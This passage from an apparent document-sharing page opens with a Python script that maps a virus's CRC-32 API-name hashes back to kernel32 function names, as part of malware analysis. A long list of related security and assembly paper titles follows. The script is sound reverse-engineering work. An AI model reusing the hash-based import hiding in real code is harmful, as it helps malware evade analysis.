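            lsb = crc & 1             # shr bx,1 / rcr ax,1: shifted-out bit is the carry
            crc >>= 1
            if lsb:
                crc ^= POLY           # xor ax,8320h / xor bx,0EDB8h
    return crc ^ 0xFFFFFFFF           # not edx / not ecx


# Constants from the crc32s table whose full value is printed in the listing.
WINUX_HASHES = [0xAE17EBEF, 0xAA700106, 0xC200BE21, 0x8C892DDF, 0x96B2D96C,
                0x797B49EC, 0x2AAD1211, 0xEBC6C18B, 0xB2DBD7DC, 0x7495B3AD]

# Constructed candidate list; a real analysis hashes kernel32's whole export table.
CANDIDATES = ["FindFirstFileA", "FindNextFileA", "FindClose", "CreateFileA",
              "CreateFileMappingA", "MapViewOfFile", "UnmapViewOfFile", "CloseHandle",
              "VirtualAlloc", "VirtualFree", "WriteFile", "SetFilePointer",
              "GetCurrentDirectoryA", "SetCurrentDirectoryA", "OutputDebugStringA",
              "GetProcAddress", "LoadLibraryA", "ExitProcess"]


def hash_table(candidates):
    """hash -> name for every candidate: the inverse of what get_api computes on the fly."""
    return {crc32_29a(n.encode("ascii")): n for n in candidates}


def resolve(hashes, candidates=CANDIDATES):
    """Map each hash to the candidate that produces it, or None when none does."""
    table = hash_table(candidates)
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    for h, n in resolve(WINUX_HASHES).items():
        print(f"{h:08X} -> {n}")
```

A constant that resolves to None either names an export missing from the candidate list or was mis-transcribed by the extraction that produced this page; since the routine is plain CRC-32, the same table can be rebuilt with binascii.crc32 over an export list dumped from kernel32.dll.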
Analysis of Win32.Scream
Analysis of Win32.Scream 1. Introduction Scream is a very interesting virus as it combines a lot of techniques written inside of it. In this paper I ll cover all of its features and internals. I ll dissect
More informationTitanMist: Your First Step to Reversing Nirvana TitanMist. mist.reversinglabs.com
TitanMist: Your First Step to Reversing Nirvana TitanMist mist.reversinglabs.com Contents Introduction to TitanEngine.. 3 Introduction to TitanMist 4 Creating an unpacker for TitanMist.. 5 References and
More informationDisassembly of False Positives for Microsoft Word under SCRAP
Disassembly of False Positives for Microsoft Word under SCRAP We evaluated Word application of Microsoft Office 2010 Suite using a 54 KiB document [1] under the SCRAP configuration S 7,4 for one billion
More informationSystems Design & Programming Data Movement Instructions. Intel Assembly
Intel Assembly Data Movement Instruction: mov (covered already) push, pop lea (mov and offset) lds, les, lfs, lgs, lss movs, lods, stos ins, outs xchg, xlat lahf, sahf (not covered) in, out movsx, movzx
More informationComputer Organization and Assembly Language
Computer Organization and Assembly Language Lecture 8 - Strings and Arrays Introduction We already know that assembly code will execute significantly faster than code written in a higher-level language
More informationCS412/CS413. Introduction to Compilers Tim Teitelbaum. Lecture 20: Stack Frames 7 March 08
CS412/CS413 Introduction to Compilers Tim Teitelbaum Lecture 20: Stack Frames 7 March 08 CS 412/413 Spring 2008 Introduction to Compilers 1 Where We Are Source code if (b == 0) a = b; Low-level IR code
More informationA Tiny Guide to Programming in 32-bit x86 Assembly Language
CS308, Spring 1999 A Tiny Guide to Programming in 32-bit x86 Assembly Language by Adam Ferrari, ferrari@virginia.edu (with changes by Alan Batson, batson@virginia.edu and Mike Lack, mnl3j@virginia.edu)
More informationComplete 8086 instruction set
Page 1 of 53 Complete 8086 instruction set Quick reference: AAA AAD AAM AAS ADC ADD AND CALL CBW CLC CLD CLI CMC CMP CMPSB CMPSW CWD DAA DAS DEC DIV HLT IDIV IMUL IN INC INT INTO I JA JAE JB JBE JC JCXZ
More information64-Bit NASM Notes. Invoking 64-Bit NASM
64-Bit NASM Notes The transition from 32- to 64-bit architectures is no joke, as anyone who has wrestled with 32/64 bit incompatibilities will attest We note here some key differences between 32- and 64-bit
More informationFighting malware on your own
Fighting malware on your own Vitaliy Kamlyuk Senior Virus Analyst Kaspersky Lab Vitaly.Kamluk@kaspersky.com Why fight malware on your own? 5 reasons: 1. Touch 100% of protection yourself 2. Be prepared
More informationAbysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title Version Discovery Vendor Impact Contact Twitter CVE : Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability : QuickTime player 7.6.5
More informationOpenBSD Remote Exploit
OpenBSD Remote Exploit Only two remote holes in the default install Alfredo Ortega, Gerardo Richarte Core Security April 2007 Abstract OpenBSD is regarded as a very secure Operating System. This article
More informationAbysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title Version Analysis Vendor Impact Contact Twitter CVE : Microsoft MPEG Layer- 3 Audio Stack Based Overflow : l3codeca.acm (XP SP2 XP SP3) : http://www.abysssec.com
More informationREpsych. : psycholigical warfare in reverse engineering. def con 2015 // domas
REpsych : psycholigical warfare in reverse engineering { def con 2015 // domas Warning This serves no purpose Taking something apart to figure out how it works With software Interfacing Documentation Obsolescence
More informationSoftware Fingerprinting for Automated Malicious Code Analysis
Software Fingerprinting for Automated Malicious Code Analysis Philippe Charland Mission Critical Cyber Security Section October 25, 2012 Terms of Release: This document is approved for release to Defence
More informationThe Beast is Resting in Your Memory On Return-Oriented Programming Attacks and Mitigation Techniques To appear at USENIX Security & BlackHat USA, 2014
Intelligent Things, Vehicles and Factories: Intel Workshop on Cyberphysical and Mobile Security 2014, Darmstadt, June 11 The Beast is Resting in Your Memory On Return-Oriented Programming Attacks and Mitigation
More informationMachine-Level Programming II: Arithmetic & Control
Mellon Machine-Level Programming II: Arithmetic & Control 15-213 / 18-213: Introduction to Computer Systems 6 th Lecture, Jan 29, 2015 Instructors: Seth Copen Goldstein, Franz Franchetti, Greg Kesden 1
More informationFor a 64-bit system. I - Presentation Of The Shellcode
#How To Create Your Own Shellcode On Arch Linux? #Author : N3td3v!l #Contact-mail : 4nonymouse@usa.com #Website : Nopotm.ir #Spcial tnx to : C0nn3ct0r And All Honest Hackerz and Security Managers I - Presentation
More informationHacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail All materials is licensed under a Creative Commons Share Alike license http://creativecommonsorg/licenses/by-sa/30/ # whoami Ali
More informationAssembly Language: Function Calls" Jennifer Rexford!
Assembly Language: Function Calls" Jennifer Rexford! 1 Goals of this Lecture" Function call problems:! Calling and returning! Passing parameters! Storing local variables! Handling registers without interference!
More informationBuffer Overflows. Security 2011
Buffer Overflows Security 2011 Memory Organiza;on Topics Kernel organizes memory in pages Typically 4k bytes Processes operate in a Virtual Memory Space Mapped to real 4k pages Could live in RAM or be
More informationReturn-oriented programming without returns
Faculty of Computer Science Institute for System Architecture, Operating Systems Group Return-oriented programming without urns S. Checkoway, L. Davi, A. Dmitrienko, A. Sadeghi, H. Shacham, M. Winandy
More informationA Museum of API Obfuscation on Win32
A Museum of API Obfuscation on Win32 Masaki Suenaga Senior Software Engineer Contents Abstract... 1 File Image vs. Memory Image... 2 API Analysis... 4 Generating Memory Dumps... 5 Runtime API Address Resolution...
More informationOff-by-One exploitation tutorial
Off-by-One exploitation tutorial By Saif El-Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend
More informationAttacking x86 Windows Binaries by Jump Oriented Programming
Attacking x86 Windows Binaries by Jump Oriented Programming L. Erdődi * * Faculty of John von Neumann, Óbuda University, Budapest, Hungary erdodi.laszlo@nik.uni-obuda.hu Abstract Jump oriented programming
More informationOverview of IA-32 assembly programming. Lars Ailo Bongo University of Tromsø
Overview of IA-32 assembly programming Lars Ailo Bongo University of Tromsø Contents 1 Introduction... 2 2 IA-32 assembly programming... 3 2.1 Assembly Language Statements... 3 2.1 Modes...4 2.2 Registers...4
More informationCS 16: Assembly Language Programming for the IBM PC and Compatibles
CS 16: Assembly Language Programming for the IBM PC and Compatibles Start basic with some string primitive instructions Get choosy with some selected string procedures Look both ways before crossing two-dimensional
More informationTest Driven Development in Assembler a little story about growing software from nothing
Test Driven Development in Assembler a little story about growing software from nothing Olve Maudal During the last decade Test-Driven Development has become an established practice for developing software
More informationLecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z) mzahran@cs.nyu.edu http://www.mzahran.com
CSCI-UA.0201-003 Computer Systems Organization Lecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z) mzahran@cs.nyu.edu http://www.mzahran.com Some slides adapted (and slightly modified)
More informationUsing Heap Allocation in Intel Assembly Language
Using Heap Allocation in Intel Assembly Language Copyright 2005, Kip R. Irvine. All rights reserved. Dynamic memory allocation is a feature we take for granted in high-level languages such as C++ and Java.
More information8. MACROS, Modules, and Mouse
8. MACROS, Modules, and Mouse Background Macros, Modules and the Mouse is a combination of concepts that will introduce you to modular programming while learning how to interface with the mouse. Macros
More informationInstruction Set Architecture
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture Randal E. Bryant adapted by Jason Fritts http://csapp.cs.cmu.edu CS:APP2e Hardware Architecture - using Y86 ISA For learning aspects
More informationSelf Protection Techniques in Malware
DSIE 10 5 th Doctoral lsymposium on Informatics Engineering i January 28 29, 2010 Porto, Portugal Self Protection Techniques in Malware Tiago Santos Overview Introduction Malware Types Why Self Protection?
Removing Sentinel SuperPro dongle from Applications and details on dongle way of cracking Shub-Nigurrath of ARTeam Version 1.
Removing Sentinel SuperPro dongle from Applications Shub-Nigurrath of ARTeam Version 1.0 September 2006 1. Abstract... 2 2. Possible approaches: emulations vs simulation... 3 2.1. How a dongle works...
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture CS:APP2e Instruction Set Architecture Assembly Language View Processor state Registers, memory, Instructions addl, pushl, ret, How instructions
Heap-based Buffer Overflow Vulnerability in Adobe Flash Player
Analysis of Zero-Day Exploit_Issue 03 Heap-based Buffer Overflow Vulnerability in Adobe Flash Player CVE-2014-0556 20 December 2014 Table of Contents Overview... 3 1. CVE-2014-0556 Vulnerability... 3 2.
x64 Cheat Sheet Fall 2015
CS 33 Intro Computer Systems Doeppner x64 Cheat Sheet Fall 2015 1 x64 Registers x64 assembly code uses sixteen 64-bit registers. Additionally, the lower bytes of some of these registers may be accessed
INTRODUCTION TO MALWARE & MALWARE ANALYSIS
INTRODUCTION TO MALWARE & MALWARE ANALYSIS by Quick Heal R&D lab Security Simplified INTRODUCTION Very often people call everything that corrupts their system a virus without being aware of what it
1. General function and functionality of the malware
1. General function and functionality of the malware The malware executes in a command shell, it begins by checking to see if the executing file contains the MZP file extension, and then continues to access
How Compilers Work. by Walter Bright. Digital Mars
How Compilers Work by Walter Bright Digital Mars Compilers I've Built D programming language C++ C Javascript Java A.B.E.L Compiler Compilers Regex Lex Yacc Spirit Do only the easiest part Not very customizable
Windows Assembly Programming Tutorial
JEFF HUANG (huang6@uiuc.edu) December 10, 2003 Windows Assembly Programming Tutorial Version 1.02 Copyright 2003, Jeff Huang. All rights reserved. by Jeff Huang Table of Contents Introduction... 2 Why
ASMXMPLE (assembly listing)
page 44,100 TITLE ASMXMPLE Video equ 10h ;video functions interrupt number Keyboard equ 16h ;keyboard functions interrupt number DOS equ 21h ;call DOS interrupt number PrtSc equ 5h ;Print Screen Bios interrupt
CS61: Systems Programming and Machine Organization
CS61: Systems Programming and Machine Organization Fall 2009 Section Notes for Week 2 (September 14th - 18th) Topics to be covered: I. Binary Basics II. Signed Numbers III. Architecture Overview IV.
Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection
USENIX Security Symposium 2014, San Diego, CA, USA Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection Lucas Davi Intel Collaborative Research Institute for
Assembly Language Tutorial
Assembly Language Tutorial ASSEMBLY LANGUAGE TUTORIAL by tutorialspoint.com tutorialspoint.com i ABOUT THE TUTORIAL Assembly Programming Tutorial Assembly language is a low-level programming language for
esrever gnireenigne tfosorcim seiranib
esrever gnireenigne tfosorcim seiranib Alexander Sotirov asotirov@determina.com CanSecWest / core06 Reverse Engineering Microsoft Binaries Alexander Sotirov asotirov@determina.com CanSecWest / core06 Overview
Violating Database - Enforced Security Mechanisms
Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [chris@ngssoftware.com] 18/06/2002 An NGSSoftware Insight Security Research (NISR)
Syscall Proxying - Simulating remote execution Maximiliano Caceres <maximiliano.caceres@corest.com> Copyright 2002 CORE SECURITY TECHNOLOGIES
Syscall Proxying - Simulating remote execution Maximiliano Caceres Copyright 2002 CORE SECURITY TECHNOLOGIES Table of Contents Abstract
Binary Obfuscation from the Top Down. How to make your compiler do your dirty work.
from the Top Down How to make your compiler do your dirty work. Why Top Down? Assembly, while simple, is tedious. It's easier for us to write higher-level code. Some of us. Why do it by hand when you can
Packers Models. simple. malware. advanced. allocation. decryption. decompression. engine loading. integrity check. DRM Management
allocation allocation (VirtualAlloc / empty section) trapped start allocation (VirtualAlloc / empty section) (MANY layers, add/rol/xor) startup decompression engine loading (one layer, add/rol/xor) (Tea/RC4/operators)
About the Tutorial. Audience. Prerequisites. Copyright & Disclaimer
About the Tutorial Assembly language is a low-level programming language for a computer or other programmable device specific to a particular computer architecture in contrast to most high-level programming
Packers. (5th April 2010) Ange Albertini http://corkami.blogspot.com Creative Commons Attribution 3.0
Packers (5th April 2010) Ange Albertini 3.0 Table of contents 3 Models: simple, malware, advanced 4 Categories and Features: compresser, protecter, crypter, bundler, virtualiser, mutater 5 Landscape: Free,
Harnessing Intelligence from Malware Repositories
Harnessing Intelligence from Malware Repositories Arun Lakhotia and Vivek Notani Software Research Lab University of Louisiana at Lafayette arun@louisiana.edu, vxn4849@louisiana.edu 7/22/2015 (C) 2015
Stack Overflows. Mitchell Adair
Stack Overflows Mitchell Adair Outline Why? What? There once was a VM Virtual Memory Registers Stack stack1, stack2, stack3 Resources Why? Real problem Real money Real recognition Still prevalent Very
Phoenix Technologies Ltd.
PC Division Desktop Product Line Subject: Standard BIOS 32-bit Service Directory Proposal Revision: 0.4 Revision Date: June 22, 1993 Document ID: Author: ATBIOS Thomas C. Block Origin Date: May 24, 1993
Introduction to Reverse Engineering
Introduction to Reverse Engineering Inbar Raz Malware Research Lab Manager December 2011 What is Reverse Engineering? Reverse engineering is the process of discovering the technological principles of a
X86-64 Architecture Guide
X86-64 Architecture Guide For the code-generation project, we shall expose you to a simplified version of the x86-64 platform. Example Consider the following Decaf program: class Program { int foo(int
Lecture 27 C and Assembly
Ananda Gunawardena Lecture 27 C and Assembly This is a quick introduction to working with x86 assembly. Some of the instructions and register names must be checked against the latest commands and register names.
Attacks on Virtual Machine Emulators
SYMANTEC ADVANCED THREAT RESEARCH 1 Attacks on Virtual Machine Emulators Peter Ferrie, Senior Principal Researcher, Symantec Advanced Threat Research peter_ferrie@symantec.com Abstract As virtual machine
Software Vulnerabilities
Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in
Title: Bugger The Debugger - Pre Interaction Debugger Code Execution
White Paper Title: Bugger The Debugger Pre Interaction Debugger Code Execution Prepared by: Brett Moore Network Intrusion Specialist, CTO SecurityAssessment.com Date: April 2005 Abstract The use of debuggers
W4118 Operating Systems. Junfeng Yang
W4118 Operating Systems Junfeng Yang Outline Linux overview Interrupt in Linux System call in Linux What is Linux A modern, open-source OS, based on UNIX standards 1991, 0.1 MLOC, single developer Linus
An introduction to the Return Oriented Programming. Why and How
An introduction to the Return Oriented Programming Why and How Course lecture at the Bordeaux university for the CSI Master Jonathan Salwan Keywords: ROP Intel / ARM, Tools, ROP chain generation, gadgets'
Embedded x86 Programming: Protected Mode
by JEAN GAREAU Embedded x86 Programming: Protected Mode The x86 architecture is ubiquitous on the desktop and is spilling over into embedded systems environments. This article begins a series designed
Windows XP SP3 Registry Handling Buffer Overflow
Windows XP SP3 Registry Handling Buffer Overflow by Matthew j00ru Jurczyk and Gynvael Coldwind Hispasec 1. Basic Information Name Windows XP SP3 Registry Handling Buffer Overflow Class Design Error Impact
Reversing C++ Paul Vincent Sabanal. Mark Vincent Yason
As recently as a couple of years ago, reverse engineers could get by with just knowledge of C and assembly to reverse most applications. Now, due to the increasing use of C++ in malware as well as most modern
Cloud Security Is Not (Just) Virtualization Security
Mihai Christodorescu, Reiner Sailer, Douglas Lee Schales, Daniele Sgandurra, Diego Zamboni IBM Research Cloud Security Is Not (Just) Virtualization Security Virtualization Enables Many Security Applications
風 水. Heap Feng Shui in JavaScript. Alexander Sotirov. asotirov@determina.com
風 水 Heap Feng Shui in JavaScript Alexander Sotirov asotirov@determina.com Black Hat Europe 2007 Introduction What is Heap Feng Shui? the ancient art of arranging heap blocks in order to redirect the program
Computer Organization and Architecture
Computer Organization and Architecture Chapter 11 Instruction Sets: Addressing Modes and Formats Instruction Set Design One goal of instruction set design is to minimize instruction length Another goal
Bypassing Anti-Virus Scanners
Bypassing Anti-Virus Scanners Abstract Anti-Virus manufacturers nowadays implement more and more complex functions and algorithms in order to detect the latest and newest viruses along with their variants.
CHAPTER 6 TASK MANAGEMENT
CHAPTER 6 TASK MANAGEMENT This chapter describes the IA-32 architecture's task management facilities. These facilities are only available when the processor is running in protected mode. 6.1. TASK MANAGEMENT
Unpacked BCD Arithmetic. BCD (ASCII) Arithmetic. Where and Why is BCD used? From the SQL Server Manual. Packed BCD, ASCII, Unpacked BCD
BCD (ASCII) Arithmetic The Intel Instruction set can handle both packed (two digits per byte) and unpacked BCD (one decimal digit per byte) We will first look at unpacked BCD Unpacked BCD can be either
Character Translation Methods
Supplement to: Irvine, Kip R. Assembly Language for Intel-Based Computers, 4th Edition. This file may be duplicated or printed for classroom use, as long as the author name, book title, and copyright notice
Intel 8086 architecture
Intel 8086 architecture Today we'll take a look at Intel's 8086, which is one of the oldest and yet most prevalent processor architectures around. We'll make many comparisons between the MIPS and 8086
The 80x86 Instruction Set
The 80x86 Instruction Set Chapter Six Until now, there has been little discussion of the instructions available on the 80x86 microprocessor. This chapter rectifies this situation.
http://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention
http://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention Oct 2, 2005 skape mmiller@hick.org Skywing Skywing@valhallalegends.com One of the big changes that Microsoft introduced
Using MMX Instructions to Convert RGB To YUV Color Conversion
Using MMX Instructions to Convert RGB To YUV Color Conversion Information for Developers and ISVs From Intel Developer Services www.intel.com/ids Information in this document is provided in connection
Steam VoIP Security by Luigi Auriemma (ReVuln Ltd.)
ReVuln Ltd. http://revuln.com @revuln info@revuln.com Revision 3 STEAM VOIP SECURITY BY LUIGI AURIEMMA Overview and details about the security issues found in the Steam voice framework. TABLE OF CONTENTS
Evaluating a ROP Defense Mechanism. Vasilis Pappas, Michalis Polychronakis, and Angelos D. Keromytis Columbia University
Evaluating a ROP Defense Mechanism Vasilis Pappas, Michalis Polychronakis, and Angelos D. Keromytis Columbia University Outline Background on ROP attacks ROP Smasher Evaluation strategy and results Discussion
Reverse Engineering Malware Part 1
Reverse Engineering Malware Part 1 Author: Arunpreet Singh Blog: https://reverse2learn.wordpress.com MD5 Hash: 1d8ea40a41988b9c3db9eff5fce3abe5 This is the first part of a 2-part series. This malware drops
Hotpatching and the Rise of Third-Party Patches
Hotpatching and the Rise of Third-Party Patches Alexander Sotirov asotirov@determina.com BlackHat USA 2006 Overview In the next one hour, we will cover: Third-party security patches _ recent developments
TODAY, FEW PROGRAMMERS USE ASSEMBLY LANGUAGE. Higher-level languages such
9 Inline Assembly Code TODAY, FEW PROGRAMMERS USE ASSEMBLY LANGUAGE. Higher-level languages such as C and C++ run on nearly all architectures and yield higher productivity when writing and maintaining
March 2012 White Paper: Police trojan study. Marcin Icewall Noga martin@hispasec.com Sergio de los Santos ssantos@hispasec.com
March 2012 White Paper: Police trojan study Marcin Icewall Noga martin@hispasec.com Sergio de los Santos ssantos@hispasec.com HISPASEC SISTEMAS Y TECNOLOGÍAS DE SEGURIDAD LA INFORMACIÓN Y TECNOLOGÍAS Index
Computer Virus Strategies and Detection Methods
Int. J. Open Problems Compt. Math., Vol. 1, No. 2, September 2008 Computer Virus Strategies and Detection Methods Essam Al Daoud 1, Iqbal H. Jebril 2 and Belal Zaqaibeh 3 1 Department of Computer Science,
612 CHAPTER 11 PROCESSOR FAMILIES (Corresponds to chapter 12 - Processor families) PROBLEMS
612 CHAPTER 11 PROCESSOR FAMILIES (Corresponds to chapter 12 - Processor families) PROBLEMS 11.1 How is conditional execution of ARM instructions (see Part I of Chapter 3) related to predicated execution
Application-Specific Attacks: Leveraging the ActionScript Virtual Machine
IBM Global Technology Services April 2008 Application-Specific Attacks: Leveraging the ActionScript Virtual Machine By Mark Dowd X-Force Researcher IBM Internet Security Systems (markdowd@au1.ibm.com)
Faculty of Engineering Student Number:
Philadelphia University Student Name: Faculty of Engineering Student Number: Dept. of Computer Engineering Final Exam, First Semester: 2012/2013 Course Title: Microprocessors Date: 17/01/2013 Course No:
Where we are CS 4120 Introduction to Compilers Abstract Assembly Instruction selection mov e1 , e2 jmp e cmp e1 , e2 [jne je jgt ] l push e1 call e
0/5/03 Where we are CS 4120 Introduction to Compilers Ross Tate Cornell University Lecture 8: Instruction Selection Intermediate code syntax-directed translation reordering with traces Canonical intermediate
Jorix kernel: real-time scheduling
Jorix kernel: real-time scheduling Joris Huizer Kwie Min Wong May 16, 2007 1 Introduction As a specialized part of the kernel, we implemented two real-time scheduling algorithms: RM (rate monotonic) and
WLSI Windows Local Shellcode Injection. Cesar Cerrudo Argeniss (www.argeniss.com)
WLSI Windows Local Shellcode Injection Cesar Cerrudo Argeniss (www.argeniss.com) Overview _ Introduction _ Establishing a LPC connection _ Creating a shared section _ The technique _ Building an exploit
The Plan Today... System Calls and API's Basics of OS design Virtual Machines
System Calls + The Plan Today... System Calls and API's Basics of OS design Virtual Machines System Calls System programs interact with the OS (and ultimately hardware) through system calls. Called when
Performance monitoring with Intel Architecture
Performance monitoring with Intel Architecture CSCE 351: Operating System Kernels Lecture 5.2 Why performance monitoring? Fine-tune software Book-keeping Locating bottlenecks Explore potential problems
Introduction. Figure 1 Schema of DarunGrim2
Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast 2011 Abstract This paper tries to reveal the vulnerable code for a particular disclosed vulnerability,
Data Security (Adatbiztonság). Targeted malware. Dr. Bencsáth Boldizsár, assistant professor, BME Department of Networked Systems and Services, bencsath@crysys.hit.bme.
Data Security (Adatbiztonság) Targeted malware 5 May 2014, Budapest Dr. Bencsáth Boldizsár, assistant professor, BME Department of Networked Systems and Services bencsath@crysys.hit.bme.hu Targeted Attacks Although many expected,
There's a kernel security researcher named Dan Rosenberg who's done a lot of Linux kernel vulnerability research
There's a kernel security researcher named Dan Rosenberg who's done a lot of Linux kernel vulnerability research That's unavoidable, but the Linux kernel developers don't do very much to make the situation
High-speed image processing algorithms using MMX hardware
High-speed image processing algorithms using MMX hardware J. W. V. Miller and J. Wood The University of Michigan-Dearborn ABSTRACT Low-cost PC-based machine vision systems have become more common due to
Chapter 4 Processor Architecture
Chapter 4 Processor Architecture Modern microprocessors are among the most complex systems ever created by humans. A single silicon chip, roughly the size of a fingernail, can contain a complete high-performance
Vigilante: End-to-End Containment of Internet Worms
Vigilante: End-to-End Containment of Internet Worms Manuel Costa 1,2, Jon Crowcroft 1, Miguel Castro 2, Antony Rowstron 2, Lidong Zhou 3, Lintao Zhang 3 and Paul Barham 2 1 University of Cambridge, Computer
Hacking the Preboot execution Environment
Hacking the Preboot execution Environment Using the BIOS network stack for other purposes Julien Vanegue jfv@cesar.org.br CESAR Recife Center for Advanced Studies and Systems, Brasil. September 27, 2008
Inside a killer IMBot. Wei Ming Khoo University of Cambridge 19 Nov 2010
Do you? or Inside a killer IMBot Wei Ming Khoo University of Cambridge 19 Nov 2010 Background Tracking a botnet propagating over Skype & Yahoo IM. Bait is Foto Exploits social connectivity (friend